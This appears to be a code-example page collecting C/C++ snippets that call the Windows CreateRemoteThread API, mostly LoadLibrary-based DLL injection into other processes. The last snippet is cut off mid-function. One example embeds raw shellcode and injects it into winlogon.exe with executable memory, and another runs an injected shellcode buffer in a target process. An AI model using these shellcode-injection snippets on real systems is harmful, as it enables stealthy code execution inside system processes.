Esempio n. 1
0
int InjectDLL(char *dll, int ProcessID) {
	HANDLE Proc, RemoteThread;
	LPVOID RemoteStringPtr, LoadLibAddr;
	int writeProcError;

	if(!ProcessID) {
		return 1;
	}
	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
	if(!Proc) {
		return 2;
	}
	LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
	if (LoadLibAddr == NULL) {
		return 3;
	}
	RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
	if (RemoteStringPtr == NULL) {
		return 4;
	}
	writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);
	if (writeProcError == 0) {
		return 5;
	}
	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);
	if (RemoteThread == NULL) {
		return 6;
	}
	CloseHandle(Proc);
	return 0;
}
Esempio n. 2
0
//-----------------------------------------------------------------------------
// Name: Execute
// Object: execute RemoteProcFuncAddress proc in remote process (blocking call : function will not return until thread as finished)
//         Use this function if you don't have injected code (func already exist in remote process)
//         WARNING A DIRECT CALL WILL WORK ONLY FOR FUNC HAVING 1 PARAMETER AND IF THIS PARAMETER IS A POINTER
//         else you have to do code injection like done in RemoteGetProcAddress, RemoteGetModuleHandleThreadProc
//         RemoteFreeLibrary
// Parameters :
//     in  : FARPROC RemoteProcFunc : remote address of the proc func to execute
//     out : LPDWORD lpExitCode : exit code of TreadProc
//     return : FALSE on error
//-----------------------------------------------------------------------------
BOOL CCodeInject::Execute(FARPROC RemoteProcFuncAddress,LPDWORD lpExitCode)
{
    HANDLE       hThread = NULL; // the handle to the thread executing the remote copy of ThreadProc;
    DWORD        dwThreadId = 0;

    if (IsBadWritePtr(lpExitCode,sizeof(DWORD)))
        return FALSE;

    *lpExitCode=0;

    // Start execution of remote ThreadProc
    hThread = CreateRemoteThread(this->hProcess,
                                NULL,
                                0,
                                (LPTHREAD_START_ROUTINE) RemoteProcFuncAddress,
                                this->pDataRemote,
                                0,
                                &dwThreadId
                                );
    if (!hThread)
        return FALSE;

    // wait for end of thread
    if (WaitForSingleObject(hThread, INFINITE)!=WAIT_OBJECT_0)
    {
        CloseHandle(hThread);
        return FALSE;
    }

    GetExitCodeThread(hThread, lpExitCode);
    CloseHandle(hThread);
    return TRUE;
}
Esempio n. 3
0
// TODO: comment.
BOOL RemoteSynchronousCall(HANDLE process, LPVOID function, LPVOID argument, LPDWORD result) {
  LPTHREAD_START_ROUTINE routine = static_cast<LPTHREAD_START_ROUTINE>(static_cast<LPVOID>(function));
  ScopedHandle thread(CreateRemoteThread(process, NULL, 0, routine, argument, 0, NULL));
  if(thread.handle == NULL) {
    THROW_ERROR("Unable to create a thread in the remote process!");
    return FALSE;
  }

  DWORD event = WaitForSingleObject(thread.handle, INFINITE);
  if(event != WAIT_OBJECT_0) {
    THROW_ERROR("Unable to wait for the thread to finish!");
    return FALSE;
  }

  DWORD exit_code;
  BOOL rv = GetExitCodeThread(thread.handle, &exit_code);
  if(rv == FALSE) {
    THROW_ERROR("Unable to get remote thread's exit code!");
    return FALSE;
  }

  if(!thread.Close()) {
    THROW_ERROR("Unable to close remote thread!");
    return FALSE;
  }

  *result = exit_code;
  return TRUE;
}
Esempio n. 4
0
int main() {
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    CreateProcessW(PROC_NAME, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
    LPTHREAD_START_ROUTINE pLoadLibraryW =
    	(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");

    SIZE_T dwLength = (wcslen(DLL_NAME) + 1) * 2;
    LPVOID lpLibName = VirtualAllocEx(pi.hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);

    SIZE_T written = 0;
    WriteProcessMemory(pi.hProcess, lpLibName, DLL_NAME, dwLength, &written);

    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, NULL, pLoadLibraryW, lpLibName, NULL, NULL);
    WaitForSingleObject(hThread, INFINITE);

    CloseHandle(hThread);
    ResumeThread(pi.hThread);

    VirtualFreeEx(pi.hProcess, lpLibName, dwLength, MEM_RELEASE);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return 0;
}
Esempio n. 5
0
bool LoadRemoteDll(DWORD pid, const char* dllPath)
{
	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

	if (hProc == NULL)
		return false;

	PVOID p = VirtualAllocEx(hProc, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
	DWORD l;
	BOOL r = WriteProcessMemory(hProc, p, dllPath, strlen(dllPath) + 1, &l);

	if (!r) {

		VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);
		return false;
	}

	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, 
		(LPTHREAD_START_ROUTINE )GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA"), 
		p, 0, &l);

	VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);

	if (hThread == NULL) {

		return false;
	}

	WaitForSingleObject(hThread, INFINITE);
	GetExitCodeThread(hThread, &l);
	CloseHandle(hThread);
	return l != 0;
}
Esempio n. 6
0
/*
	Unload Dll from process

	RETURN:
		Error code
*/
DWORD CMemDll::Unload()
{
	HANDLE hThread = NULL;
	HMODULE hDll = NULL;

    if(!CMemCore::Instance().m_hProcess)
        return ERROR_INVALID_HANDLE;

	//Search for dll in process
	if((hDll = (HMODULE)GetModuleAddress(GetProcessId(CMemCore::Instance().m_hProcess), TEXT(DLL_NAME))) !=0 )
	{
		hThread = CreateRemoteThread
			(
				CMemCore::Instance().m_hProcess, 
				NULL, 0, 
				(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "FreeLibrary"), 
				(void*)hDll, 
				0, NULL
			);

		if(hThread == NULL)
		{
			MessageBox(NULL, TEXT("Cannot create thread"), TEXT("Error"), MB_ICONERROR);
			return GetLastError();
		}
		//Wait for completion
		WaitForSingleObject(hThread, INFINITE);
		CloseHandle(hThread);
	}

    return ERROR_SUCCESS;
}
Esempio n. 7
0
NTSTATUS
NTAPI
BaseCreateThreadPoolThread(IN PTHREAD_START_ROUTINE Function,
                           IN PVOID Parameter,
                           OUT PHANDLE ThreadHandle)
{
    NTSTATUS Status;

    /* Create a Win32 thread */
    *ThreadHandle = CreateRemoteThread(NtCurrentProcess(),
                                       NULL,
                                       0,
                                       Function,
                                       Parameter,
                                       CREATE_SUSPENDED,
                                       NULL);
    if (!(*ThreadHandle))
    {
        /* Get the status value if we couldn't get a handle */
        Status = NtCurrentTeb()->LastStatusValue;
        if (NT_SUCCESS(Status)) Status = STATUS_UNSUCCESSFUL;
    }
    else
    {
        /* Set success code */
        Status = STATUS_SUCCESS;
    }

    /* All done */
    return Status;
}
Esempio n. 8
0
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
	int nArgs;
	LPWSTR* lpszArgs = CommandLineToArgvW(GetCommandLineW(), &nArgs);
	int showHelp = (nArgs < 2);
	int showAttachNotification = 0;
	LPWSTR lpszTargetCmd = NULL;

	int posArg = 0;
	while (++posArg < nArgs) {
		if (!wcscmp(lpszArgs[posArg], L"/?")) {
			showHelp = 1;
			break;
		} else if (!wcscmp(lpszArgs[posArg], L"/M")) {
			showAttachNotification = 1;
		} else {
			size_t cbTargetArgs = strlen(lpCmdLine) * sizeof(wchar_t);
			lpszTargetCmd = (wchar_t*) malloc(cbTargetArgs);
			memset(lpszTargetCmd, 0, cbTargetArgs);
			wchar_t* lpszTargetTemp = lpszTargetCmd;
			size_t nArgLength = 0;
			for (int i = posArg; i < nArgs; i++) {
				nArgLength = wcslen(lpszArgs[i]);
				wcscpy(lpszTargetTemp, lpszArgs[i]);
				if (posArg < nArgs-1) {
					lpszTargetTemp += wcslen(lpszArgs[i]);
					wcscpy(lpszTargetTemp, L" ");
					lpszTargetTemp++;
				}
			}
			break;
		}
	}
	if (showHelp) {
		MessageBox(0, L"ReLocale by kolpazar\n\nUsage: ReLocale [opts] exe [args]\n\nOpts:\n/M Display a message after hooking\n/? Display this window", L"ReLocale", MB_OK);
		return 0;
	}
	if (showAttachNotification) {
		SetEnvironmentVariable(k_lpAttachNotification, L"1");
	}
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(STARTUPINFO));
	si.cb = sizeof(STARTUPINFO);
	CreateProcess(NULL, lpszTargetCmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED, FALSE, NULL, &si, &pi);
	
	char szHookLibrary[MAX_PATH];
#ifndef _M_AMD64
	strcpy((char*) &szHookLibrary, "ReLocaleHook.dll");
#else
	strcpy((char*) &szHookLibrary, "ReLocaleHook64.dll");
#endif
	LPVOID lpProcessMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(szHookLibrary), MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(pi.hProcess, lpProcessMem, &szHookLibrary, sizeof(szHookLibrary), NULL);

	HANDLE hDllThread = CreateRemoteThread(pi.hProcess, NULL, 0, 
		(LPTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), lpProcessMem, 0, NULL);
	WaitForSingleObject(hDllThread, INFINITE);
	ResumeThread(pi.hThread);
	return 0;
}
Esempio n. 9
0
VOID InjectCreateProcess(PCHAR pName, PCHAR pDllName, PCHAR pCmdArg)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ULONG_PTR dwAddr;
    HANDLE hThread;
    HMODULE hKernel32;
    CHAR CurrentPath[MAX_PATH ];

    if (!GetCurrentDirectory(sizeof(CurrentPath) - 1, CurrentPath)) {
        printf("[-] InjectCreateProcess - GetCurrentDirectory failed : %lu\n", GetLastError());
        return;
    }
    hKernel32 = GetModuleHandleA("kernel32.dll");
    memset(&si, 0, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    memset(&pi, 0, sizeof(PROCESS_INFORMATION));
    if (!CreateProcessA(pName, pCmdArg, NULL, NULL, FALSE, CREATE_SUSPENDED, GetEnvironmentStrings(), CurrentPath, &si, &pi)) {
        printf("[-] InjectCreateProcess - CreateProcessA() failed : %lu\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    dwAddr = (ULONG_PTR)VirtualAllocEx(pi.hProcess, 0, strlen(pDllName) + 1, MEM_COMMIT, PAGE_READWRITE);
    if ((LPVOID)dwAddr == NULL) {
        printf("[-] InjectCreateProcess - VirtualAllocEx failed() : %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 42);
        exit(EXIT_FAILURE);
    }
    WriteProcessMemory(pi.hProcess, (LPVOID)dwAddr, (void*)pDllName, strlen(pDllName) + 1, NULL);
    hThread = CreateRemoteThread(pi.hProcess, NULL, 0,
                                 (LPTHREAD_START_ROUTINE) GetProcAddress(hKernel32,"LoadLibraryA"),
                                 (LPVOID)dwAddr, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
    ResumeThread(pi.hThread);
    CloseHandle(hThread);
}
Esempio n. 10
0
File: Utils.cpp Progetto: LeeHM/etmp
bool CUtils::InjectLibraryIntoProcess(HANDLE hProcess, char * szLibPath)
{
	bool bReturn = true;

	size_t sLibraryPathLen = (strlen(szLibPath) + 1);

	void * pRemoteLibraryPath = VirtualAllocEx(hProcess, NULL, sLibraryPathLen, MEM_COMMIT, PAGE_READWRITE);

	SIZE_T sBytesWritten = 0;
	WriteProcessMemory(hProcess, pRemoteLibraryPath, (void *)szLibPath, sLibraryPathLen, &sBytesWritten);

	if(sBytesWritten != sLibraryPathLen) 
	{
		bReturn = false;
	} else {
		HMODULE hKernel32 = GetModuleHandle("Kernel32");
		FARPROC pfnLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
		HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnLoadLibraryA, pRemoteLibraryPath, 0, NULL);
		
		if(hThread) 
		{
			WaitForSingleObject(hThread, INFINITE);
			CloseHandle(hThread);
		} else {
			bReturn = false;
		}
	}

	VirtualFreeEx(hProcess, pRemoteLibraryPath, sizeof(pRemoteLibraryPath), MEM_RELEASE);
	return bReturn;
}
Esempio n. 11
0
int InjectDLL(HANDLE hProcess, TCHAR *szDllPath)
{
	int szDllPathLen = lstrlen(szDllPath) + 1;

	PWSTR RemoteProcessMemory = (PWSTR)VirtualAllocEx(hProcess, 
		NULL, szDllPathLen, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
	if(RemoteProcessMemory == NULL)
		return -1;
	
	BOOL bRet = WriteProcessMemory(hProcess, 
		RemoteProcessMemory, (PVOID)szDllPath, szDllPathLen, NULL);
	if(bRet == FALSE)
		return -1;
	
	PTHREAD_START_ROUTINE pfnThreadRtn;
	pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(
		GetModuleHandle("kernel32"), "LoadLibraryA");
	if(pfnThreadRtn == NULL)
		return -1;
	
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 
		pfnThreadRtn, RemoteProcessMemory, 0, NULL);
	if(hThread == NULL)
		return -1;

	WaitForSingleObject(hThread, INFINITE);
	
	VirtualFreeEx(hProcess, 
		RemoteProcessMemory, szDllPathLen, MEM_RELEASE);

	CloseHandle(hThread);
	return 0;
}
Esempio n. 12
0
bool injectDLL(HANDLE process, const wchar_t* dllName)
{
	LPVOID loadLibAddress = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryW");
	LPVOID nameAddress = loadStringToMemory(process, dllName);

	if (!nameAddress || !loadLibAddress)
		return false;

	HANDLE creationThread = CreateRemoteThread(process, NULL, NULL,
												static_cast<LPTHREAD_START_ROUTINE>(loadLibAddress),
												nameAddress, NULL, NULL);
	
	if (creationThread)
	{
		WaitForSingleObject(creationThread, INFINITE);
		
		DWORD ret;
		GetExitCodeThread(creationThread, &ret);
		CloseHandle(creationThread);
		
		return (ret != NULL);
	}
	else
		return false;
}
Esempio n. 13
0
void inject(DWORD pid)
{
	HANDLE phd,h;
	LPVOID shell;
	
	phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
	
	if(phd==INVALID_HANDLE_VALUE)
	{
		printf("\nOpenProcess() Failed."); return ;
	}
	
	shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(shell==NULL)
	{
		printf("\nVirtualAllocEx() Failed");  CloseHandle(phd); return ;
	}
	
	WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
	printf("\nInjection successfull\n");
	printf("Running Shellcode......\n");
	
	h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
	if(h==NULL)
	{
		printf("Failed to Run Shellcode\n"); return ;
	}
	else
		printf("shellcode Execution Successfull");
}
Esempio n. 14
0
bool DebugFrontend::ExecuteRemoteKernelFuntion(HANDLE process, const char* functionName, LPVOID param, DWORD& exitCode)
{

    HMODULE kernelModule = GetModuleHandle("Kernel32");
    FARPROC function = GetProcAddress(kernelModule, functionName);

    if (function == NULL)
    {
        return false;
    }

    DWORD threadId;
    HANDLE thread = CreateRemoteThread(process, NULL, 0,
        (LPTHREAD_START_ROUTINE)function, param, 0, &threadId);

    if (thread != NULL)
    {
        
        WaitForSingleObject(thread, INFINITE);
        GetExitCodeThread(thread, &exitCode);
        
        CloseHandle(thread);
        return true;

    }
    else
    {
        return false;
    }

}
Esempio n. 15
0
void Launch()
{
	void* pMem;
	char shellcode[] =
		"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
		"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
		"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
		"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
		"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
		"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
		"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
		"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
		"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
		"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
		"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
		"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
		"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
		"\x65\x78\x65\x00";

	wchar_t* str = L"winlogon.exe";
	DWORD PID = getProcessId(str);
	HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
	HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
Esempio n. 16
0
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
	HANDLE                  hProcess, hThread;
	LPVOID                  pRemoteBuf;
	DWORD                   dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);
	LPTHREAD_START_ROUTINE  pThreadProc;

	if ( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) )
    {
        printf("OpenProcess(%d) failed!!!\n", dwPID);
		return FALSE;
    }

	pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, 
                                MEM_COMMIT, PAGE_READWRITE);

	WriteProcessMemory(hProcess, pRemoteBuf, 
                       (LPVOID)szDllPath, dwBufSize, NULL);

	pThreadProc = (LPTHREAD_START_ROUTINE)
                  GetProcAddress(GetModuleHandle(L"kernel32.dll"), 
                                 "LoadLibraryW");
	hThread = CreateRemoteThread(hProcess, NULL, 0, 
                                 pThreadProc, pRemoteBuf, 0, NULL);
	WaitForSingleObject(hThread, INFINITE);	

	VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);

	CloseHandle(hThread);
	CloseHandle(hProcess);

	return TRUE;
}
Esempio n. 17
0
/***********************************************************************
 *           CreateThread   (KERNEL32.@)
 */
HANDLE WINAPI CreateThread( SECURITY_ATTRIBUTES *sa, SIZE_T stack,
                            LPTHREAD_START_ROUTINE start, LPVOID param,
                            DWORD flags, LPDWORD id )
{
     return CreateRemoteThread( GetCurrentProcess(),
                                sa, stack, start, param, flags, id );
}
Esempio n. 18
0
int main() {
	HANDLE proc = 0;
	HANDLE procThread = 0;
	bool notified = false;
	while (proc == 0) {
		proc = GetProcessByName(PROC_NAME);
		if (proc == 0) {
			if (!notified) {
				printf("proc doesn't exist, waiting... gle=%x\n", GetLastError());
				notified = true;
			}
			Sleep(1);
		}
	}

	void *paramAddr = VirtualAllocEx(proc, 0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
	SIZE_T bytesWritten = 0;
	char dllPath[MAX_PATH];
	int len = GetCurrentDirectory(MAX_PATH, dllPath);
	strcpy(dllPath + len, "\\" DLL_NAME);

	WriteProcessMemory(proc, paramAddr, dllPath, 0x100, &bytesWritten);
	HANDLE thread = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)paramAddr, 0, 0);
	if (procThread) {
		ResumeThread(procThread);
	}
}
Esempio n. 19
0
BOOL CCollisionMap::RemoveRoomData(DWORD LevelNo, DWORD x, DWORD y)
{
	BYTE AsmStub[] = {
	0x68, 00,00,00,00, // Pushing the pAct to the Stack
	0x68, 00,00,00,00, // Pushing the LevelId to the Stack
	0x68, 00,00,00,00, // Pushing the xPos to the Stack
	0x68, 00,00,00,00, // Pushing the yPos to the Stack
	0x68, 00,00,00,00, // Pushing the pRoom to the Stack
	0xB8, 00,00,00,00, // MOV EAX, 0x00
	0xFF, 0xD0,		   // Call Eax
	0xC3,
	};

	*(DWORD*)&AsmStub[1] = PlayerInfo.dwRoomAddr;
	*(DWORD*)&AsmStub[6] = y;
	*(DWORD*)&AsmStub[11] = x;
	*(DWORD*)&AsmStub[16] = LevelNo;
	*(DWORD*)&AsmStub[21] = PlayerInfo.dwActAddr;
	*(DWORD*)&AsmStub[26] = CCollisionMap::DLLInfo.D2Common + 0x56830;

	LPVOID Address = VirtualAllocEx(Memory.WindowHandle, NULL, sizeof(AsmStub), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	Memory.WriteMemory((DWORD)Address,AsmStub,sizeof(AsmStub));
	HANDLE pHandle = CreateRemoteThread(Memory.WindowHandle,NULL,sizeof(DWORD),(LPTHREAD_START_ROUTINE)Address,NULL,NULL,NULL);
	WaitForSingleObject(pHandle,INFINITE);
	CloseHandle(pHandle);
	VirtualFreeEx(Memory.WindowHandle,(LPVOID)Address,sizeof(AsmStub),MEM_RELEASE);

	return TRUE;
}
Esempio n. 20
0
        static void inject(int pid, const std::string & path)
        {
            HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
            std::cout << "OpenProcess() return 0x" << std::hex << process << std::endl;
            if (process)
            {
                int n = path.size() + 1;
                LPVOID ptr = VirtualAllocEx(process, NULL, n, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

                if (ptr)
                {
                    DWORD m = 0;
                    WriteProcessMemory(process, ptr, path.c_str(), n, &m);
                    if (m == n)
                    {
                        LPTHREAD_START_ROUTINE loadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
                        if (loadLibrary)
                        {
                            DWORD tid = 0;
                            HANDLE thread = CreateRemoteThread(process, NULL, 0, loadLibrary, ptr, 0, &tid);
                            if (thread != NULL)
                            {
                                ::WaitForSingleObject(thread, INFINITE);
                                DWORD exitCode = 0;
                                ::GetExitCodeThread(thread, &exitCode);
                            }
                        }
                    }
                }
            }
        }
Esempio n. 21
0
void Inject(HANDLE process, LPCSTR modulePath)
{
	if(!FileExists(modulePath))
	{
		MessageBox(0, modulePath, "File Not Found", 0);
		return;
	}

    LPVOID address = nullptr;
    BOOL success = FALSE;
    HMODULE kernel32 = nullptr;
    HANDLE thread = nullptr;

    __try
    {
        // Inject the dll path into the target process
	    address = VirtualAllocEx(process, NULL, strlen(modulePath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	    printf("Address allocated : %X\n", address);
        success = WriteProcessMemory(process, (LPVOID)address, modulePath, strlen(modulePath), NULL);
	    printf("WriteProcessMemory : %s\n", success? "successed":"failed");

        // Invoke LoadLibrary via CreateRemoteThread
	    kernel32 = GetModuleHandle("kernel32.dll");
	    printf("Kernel32 : %X\n", kernel32);
	    thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryA"), (LPVOID)address, 0, NULL);
	    printf("Remote thread handle : %X\n", thread);
    }
    __finally
    {
	    if(thread) CloseHandle(thread);
	    if(kernel32) FreeLibrary(kernel32);
	    if(address) VirtualFreeEx(process, NULL, (size_t)strlen(modulePath), MEM_RESERVE|MEM_COMMIT);
    }
}
Esempio n. 22
0
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath) {
	HANDLE hProcess =NULL, hThread = NULL;
	HMODULE hMod = NULL;
	LPVOID pRemoteBuf = NULL;
	DWORD dwBufSize = (DWORD)(_tcslen(szDllPath)+1)*sizeof(TCHAR);
	LPTHREAD_START_ROUTINE pThreadProc;
	// #1 使用dwPID获取目标进程句柄。
	if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID))) {
		_tprintf(L"OpenProcess(%d) failed![%d]\n",dwPID,GetLastError());
		return FALSE;
	}
	// #2 在目标进程的内存中分配dwBufSize大小的内存空间
	pRemoteBuf = VirtualAllocEx(hProcess,NULL,dwBufSize,MEM_COMMIT,PAGE_READWRITE);
	// #3 将要注入的dll路径写入分配的内存。
	WriteProcessMemory(hProcess,pRemoteBuf,(LPVOID)szDllPath,dwBufSize,NULL);
	// #4 获取LoadLibraryW 的API地址
	hMod = GetModuleHandle(L"kernel32.dll");
	pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod,"LoadLibraryW");
	// #5 在目标进程中运行线程
	hThread = CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteBuf,0,NULL);
	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
	CloseHandle(hProcess);
	return TRUE;
}
Esempio n. 23
0
static BOOL 
SafeTerminateProcess(HANDLE hProcess, UINT uExitCode) 
{
  DWORD dwTID, dwCode, dwErr = 0;
  HANDLE hProcessDup = INVALID_HANDLE_VALUE;
  HANDLE hRT = NULL;
  HINSTANCE hKernel = GetModuleHandle("Kernel32");
  BOOL bSuccess = FALSE;

  BOOL bDup = DuplicateHandle(GetCurrentProcess(), hProcess, GetCurrentProcess(), &hProcessDup, PROCESS_ALL_ACCESS, FALSE, 0);

  if (GetExitCodeProcess((bDup) ? hProcessDup : hProcess, &dwCode) && (dwCode == STILL_ACTIVE)) {
    FARPROC pfnExitProc;
    pfnExitProc = GetProcAddress(hKernel, "ExitProcess");
    hRT = CreateRemoteThread((bDup) ? hProcessDup : hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnExitProc, (PVOID)uExitCode, 0, &dwTID);
    if (hRT == NULL)
      dwErr = GetLastError();
  } else {
    dwErr = ERROR_PROCESS_ABORTED;
  }

  if (hRT) {
    WaitForSingleObject((bDup) ? hProcessDup : hProcess, INFINITE);
    CloseHandle(hRT);
    bSuccess = TRUE;
  }

  if (bDup)
    CloseHandle(hProcessDup);

  if (!bSuccess)
    SetLastError(dwErr);

  return bSuccess;
}
Esempio n. 24
0
/// <summary>
/// Creates new thread in the remote process
/// </summary>
/// <param name="hThread">Created thread handle</param>
/// <param name="entry">Thread entry point</param>
/// <param name="arg">Thread argument</param>
/// <param name="flags">Creation flags</param>
/// <param name="access">Access override</param>
/// <returns>Status code</returns>
NTSTATUS Native::CreateRemoteThreadT( HANDLE& hThread, ptr_t entry, ptr_t arg, CreateThreadFlags flags, DWORD access /*= THREAD_ALL_ACCESS*/ )
{
    SetLastNtStatus( STATUS_SUCCESS );
    NTSTATUS status = 0; 
    auto pCreateThread = GET_IMPORT( NtCreateThreadEx );

    if (pCreateThread)
    {
        status = pCreateThread(
            &hThread, access, NULL,
            _hProcess, reinterpret_cast<PTHREAD_START_ROUTINE>(entry),
            reinterpret_cast<LPVOID>(arg), static_cast<DWORD>(flags),
            0, 0x1000, 0x100000, NULL
            );

        if (!NT_SUCCESS( status ))
            hThread = NULL;
    }
    else
    {
        DWORD win32Flags = 0;

        if (flags & CreateSuspended)
            win32Flags = CREATE_SUSPENDED;

        hThread = CreateRemoteThread( 
            _hProcess, NULL, 0, reinterpret_cast<PTHREAD_START_ROUTINE>(entry),
            reinterpret_cast<LPVOID>(arg), win32Flags, NULL
            );

        status = LastNtStatus();
    }

    return status;
}
Esempio n. 25
0
BOOL InjectDll2(HANDLE hProcess, LPCTSTR szDllName)
{
	HANDLE hThread;
	LPVOID pRemoteBuf;
	DWORD dwBufSize = (DWORD)(_tcslen(szDllName) + 1) * sizeof(TCHAR);
	FARPROC pThreadProc;

	pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, 
                                MEM_COMMIT, PAGE_READWRITE);
    if( pRemoteBuf == NULL )
        return FALSE;

	WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllName, 
                       dwBufSize, NULL);

	pThreadProc = GetProcAddress(GetModuleHandleA("kernel32.dll"), 
                                 "LoadLibraryW");
	hThread = CreateRemoteThread(hProcess, NULL, 0, 
                                 (LPTHREAD_START_ROUTINE)pThreadProc, 
                                 pRemoteBuf, 0, NULL);
	WaitForSingleObject(hThread, INFINITE);	

	VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);

	CloseHandle(hThread);

	return TRUE;
}
Esempio n. 26
0
int wmain(int argc, wchar_t *argv[], wchar_t *envp[])
{
    HANDLE proc = 0;
    HANDLE procThread = 0;
    bool notified = false;
    while (proc == 0) 
    {
        proc = GetProcessByName(PROC_NAME);
        if (proc == 0) 
        {
            if (!notified) 
            {
                printf("Waiting for RobotArena3.exe to start... gle=%x\n", GetLastError());
                notified = true;
            }
            Sleep(1);
        }
    }

    void *paramAddr = VirtualAllocEx(proc, 0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
    SIZE_T bytesWritten = 0;
    wchar_t dllPath[MAX_PATH];
    int len = GetCurrentDirectory(MAX_PATH, dllPath);
